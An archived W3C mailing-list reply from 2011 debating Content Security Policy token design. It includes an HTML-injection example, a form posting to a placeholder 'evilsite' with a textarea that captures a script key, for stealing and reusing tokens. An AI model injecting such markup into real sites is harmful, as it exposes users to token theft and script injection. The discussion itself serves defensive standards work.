W3C home > Mailing lists > Public > public-web-security@w3.org > January 2011

Re: [Content Security Policy] Proposal to move the debate forward

From: gaz Heyes <gazheyes@gmail.com>
Date: Fri, 28 Jan 2011 10:41:07 +0000
Message-ID: <AANLkTinPwm8J5A5zJaSE=c+5Lcz180fHG2KNEjtujJBE@mail.gmail.com>
To: Gervase Markham <gerv@mozilla.org>
Cc: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org
On 28 January 2011 10:33, Gervase Markham <gerv@mozilla.org> wrote:

> How would you steal all tokens if you couldn't run any script because you
> didn't have the token?
>

HTML5 makes that nice and easy for us, form-action, form-target, <textarea>,
css styles width:100%;height:100%; there a lots of ways and HTML5 increases
them.


> If the token is equivalent to the user's session ID, then running some
> malicious script becomes an equivalent problem to stealing their session ID
> without script. That doesn't sound trivial to me.
>
> Or have I missed something?
>
>  and then inject
>>
>> If for some crazy reason you decide to
>> use session based tokens then you would have to validate all HTML
>> injections
>>
>
> I'm not sure what you mean by "validate all HTML injections", but I don't
> think anyone is suggesting that using CSP means that you can just safely
> print arbitrary user-supplied content as HTML.
>

Ok if we don't have a start and end marker and just one script key, any
injections before the script key can steal it. <form
action=//evilsite><textarea name=Can_I_have_a_key_please_bob>. If the key is
session based that means we can reuse it and that means that our second
request injects some javascript with a valid key. Now if we have a start and
end marker we can parse the content inside and determine the restrictions
e.g. this content shouldn't be posted externally, then after parsing the
HTML you can then work out if the form should work or
Received on Friday, 28 January 2011 10:41:39 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Friday, 28 January 2011 10:41:39 GMT